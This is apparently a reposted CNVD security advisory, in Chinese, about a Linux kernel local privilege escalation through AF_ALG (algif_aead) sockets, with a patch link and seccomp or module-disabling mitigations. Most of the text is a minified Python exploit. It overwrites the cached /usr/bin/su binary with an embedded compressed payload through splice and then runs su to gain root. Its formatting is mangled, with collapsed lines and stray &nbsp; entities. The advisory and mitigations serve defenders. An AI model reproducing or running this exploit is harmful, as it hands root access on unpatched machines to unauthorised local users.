文章总结： CNVD发布Linux内核本地权限提升漏洞安全公告，披露可通过AFALG套接字操纵实现本地权限提升的漏洞。公告包含Python利用代码示例，并提供官方补丁链接与两项临时修复措施：禁用algifaead内核模块或通过seccomp阻断容器内AF_ALG套接字创建。 综合评分： 85 文章分类： 漏洞分析,漏洞预警,解决方案,应急响应,终端安全

CNVD：关于Linux内核存在本地权限提升漏洞的安全公告

观雪安全

2026年4月30日 20:07 山东

在小说阅读器读本章

去阅读

exp：

#!/usr/bin/env python3import&nbsp;os as g,zlib,socket as sdef&nbsp;d(x):return bytes.fromhex(x)def&nbsp;c(f,t,c):&nbsp;a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)&nbsp;try:u.recv(8+t)&nbsp;except:0f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))while&nbsp;i<len(e):c(f,i,e[i:i+4]);i+=4g.system("su")

通过官方链接更新至最新版本：

https://git.kernel.org/stable/c/a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5

也可采用以下临时修复措施：

1、禁用algif_aead内核模块

2、通过seccomp或运行安全策略，阻断容器内AF_ALG socket创建。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：观雪安全 《CNVD：关于Linux内核存在本地权限提升漏洞的安全公告》